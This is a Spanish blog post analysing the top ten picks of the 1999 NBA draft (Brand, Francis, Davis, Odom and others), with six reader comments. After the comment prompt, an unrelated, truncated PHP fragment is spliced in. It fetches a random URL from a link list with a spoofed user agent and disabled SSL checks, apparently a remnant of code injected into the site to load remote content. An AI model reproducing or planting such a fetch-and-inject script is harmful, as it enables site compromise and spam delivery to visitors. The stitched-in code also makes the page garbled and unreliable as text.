La prisa por hacerse mayor rápido: Draft 1999

16 de January de 2009 por Viva_Dirk

Mucho tiempo después encuentro tiempo para volver a aburriros con esta larga serie de artículos (1998, 1997, 1996, 1995) que analizan de forma poco común lo sucedido en los drafts de los últimos 10 años y que no tendrá ‘moraleja’ hasta que analice el de 2008, aunque algunos ya la intuáis. Vamos con el último de la década de los 90.

Para mi este es el ejemplo de un draft bien pensado por los equipos que tenian las elecciones más altas. Ocho de las diez primeras elecciones fueron ocupadas por jugadores que habían estado al menos dos temporadas en la universidad, y en los dos que no era así, lo cierto es que tenían toda la pinta de jugadores capaces de cambiar el rumbo de una franquicia… e incluso de la liga.

Empezaremos esta vez por abajo, el Nº10 fue para Jason Terry. El base de Arizona había finalizado su cuarto curso con 20 puntos, 5.5 asistencias y casi 3 robos por encuentro, cotas que ya estaba alcanzando en su 2º año como profesional. El Nº9 fue para el alero de la universidad de Las Vegas Shawn Marion, que jugó durante tres años en dos universidades distintas. En estos tres años promedió 22 puntos por encuentro con porcentajes del 57% en tiros de campo y ya en su segundo año en la NBA alcanzaba una media de 17-10 cada noche.

El Nº8 fue a parar a un jugador calificado por algunos como mediocre y es que Andre Miller en sus cuatro años en Utah había dejado unas estadísticas de 12 puntos y 5.6 asistencias, con un último año en 15.8 puntos. Lo que no cabe duda es que Andre había aprendido a ser un base, como demostró desde su primer año en la NBA en el que ya alcanzaba sus medias universitarias en apenas 25 minutos de juego. El Nº7 fue para uno de los escoltas más puros(casi anacrónico) que ha visto la NBA en la última década, Richard Hamilton. ‘Rip’ llegaba después de tres años con los Huskies donde había promediado 19.8 puntos. En los Wizards, como jugador de segundo año, ya estaba en 18.

Wally Szczerbiak fue el Nº6. Llegaba a la liga con la fama de gran tirador y anotador después de cuatro años con los Miami Redhawks. De hecho en los dos últimos había alcanzado los 24 puntos por encuentro con porcentajes superiores al 50% en tiros de campo y al 40% en triples. Su carrera profesional ha estado marcada por las lesiones pero en su año rookie ya promediaba dobles figuras en anotación para llegar a ser All-Star en su tercer año. El único jugador llegado desde el instituto de este top-10 fue el alero Jonathan Bender elegido en el Nº5. De él se decía que era un jugador exterior de 2.10, capaz de tirar de tres, pasar el balón y desde luego vivir por encima del aro. Lo tenía todo pero nunca sabremos donde habría llegado porque las lesiones truncaron su carrera desde el primer día.

Desde Rhode Island llegaba un freshman hasta el Nº4 del draft. Lamar Odom era un chico de 2.08, zurdo, que en su primer año de universidad había promediado 17.6 puntos y 3.8 asistencias jugando como alero. Alguien que con 2.08 juega de alero en la universidad es que es muy blando o muy bueno y lo de Odom era lo segundo. Su visión de juego y el sendero de talento que dejaba tras de sí le convirtieron en el ‘nuevo Magic’, odiosas e inevitables las comparaciones. Ya sabéis que no se convirtió en nada cercano a Magic, pero en su año rookie dejó unos numeros de 16.6 puntos, 7.8 rebotes y 4.2 asistencias que nos hacían presagiar a todos la personalización del alero del futuro, aunque al final se quedara en un jugador brillante y de poco carácter.

El Nº3 fue para el explosivo base de UCLA Baron Davis. En su segundo año promedió 16 puntos, 5 asistencias y 3 robos, pero a parte de eso se trataba de un jugador que con poco más de 1.80 machacaba el aro con ferocidad y era capaz de protagonizar las acciones más espectaculares. No se podía negar que tenía carisma pero no le sirvió para jugar más de 20 minutos en su primer año. En el tercero ya era All-Star y él y sus Warriors protagonizaron la mayor sorpresa del nuevo milenio en los play-offs de 2007.

Steve Francis jugó en tres universidades distintas, una por cada curso universitario, los dos primeros en ‘plazas menores’ y en su tercer año en Maryland. Después de ese año fue elegido Nº2 del draft. Era un caso parecido al de Davis pero a diferencia de él había algunos que no le veían jugando como base en profesionales ya que disponía de cualidades innatas para ser escolta. De hecho en su último año universitario no llegaba a las 5 asistencias  pero sí a los 17 puntos. Las dudas fueron rápidamente despejadas cuando en su año rookie promedió 18 puntos, 5.3 rebotes y 6.6 asistencias. Era un base anotador pero era un base.

Y al Nº1 llegaba desde Duke un jugador de segundo año, Elton Brand. Se trataba de un power forward de 2.06, rocoso, gran taponador, mejor reboteador y solvente anotador. En su último año había conseguido 17.7 puntos de media con porcentajes superiores al 60% en tiros de campo y colocado más de 2 tapones por noche. En su primer año con los Bulls ya se ganó el que después fue su apodo, ‘Mr.20-10’. Compartió el premio del año con Steve Francis y en 2006 llevó a los Clippers a Play-Offs por primera vez desde 1993.

Comenta

6 comentarios a esta entrada

  1. RusticoColorao dice:
    #1

    Me acuerdo bien de aquel draft. Se decía que había 4 jugadores por encima del resto (Elton Brand, Baron Davis, Steve Francis y Lamar Odom). Además, llamó la atención en España por presentarse Wally Szczerbiak, nacido en Madrid creo recordar.

    Lo que sigo sin entender es como Chicago se deshizo de Brand por Chandler ainsss…Por cierto, grandes elecciones del equipo de la ciudad del viento: Brand y Artest. Lástima que a la directiva del equipo y a uno de ellos les faltase cabeza.

    Curiosidades de aquel draft…

    Duke el superfavorito para ganar el torneo final (perdió contra la Uconn de Richard Hamilton, Voskhul, Khalid-el-Amin y Wilcox…partido que tengo grabado con los comentarios de Trecet), metió a 4 jugadores en primera ronda: Brand, Avery, Langdon y Maggette.

    Ginobili fue escogido en segunda ronda (elección 57!!!!!!!!!!)…vaya robo.

    Y en este draft salieron algunos conocidos: Louis Bullock (pick 42), Quincy Lewis (pick 19 – Alicante, Bilbao), Venson Hamilton (pick 50 – Joventut, Madrid), Francisco Elson (pick 41 – Barcelona), Weis (pick 15 ¿¿¿????- Unicaja, Bilbao)

      Citar

  2. Txusma dice:
    #2

    Tb fue el draft de Kirilenko, elegido en la 24. Otro robo.

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Odom; ¿Un alero de 2.08? O muy bueno o muy blando,,, ¿por qué no ambas?

      Citar

  4. llukas70 dice:
    #4

    Odom no es blando.

      Citar

  5. Viva_Dirk dice:
    #5

    Coincido con Lukas, a Odom le falta caracter, pero no es blando ni en el rebote ni en defensa.

      Citar

  6. Noelinho dice:
    #6

    Me encantan estos artículos Viva, felicidades! 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>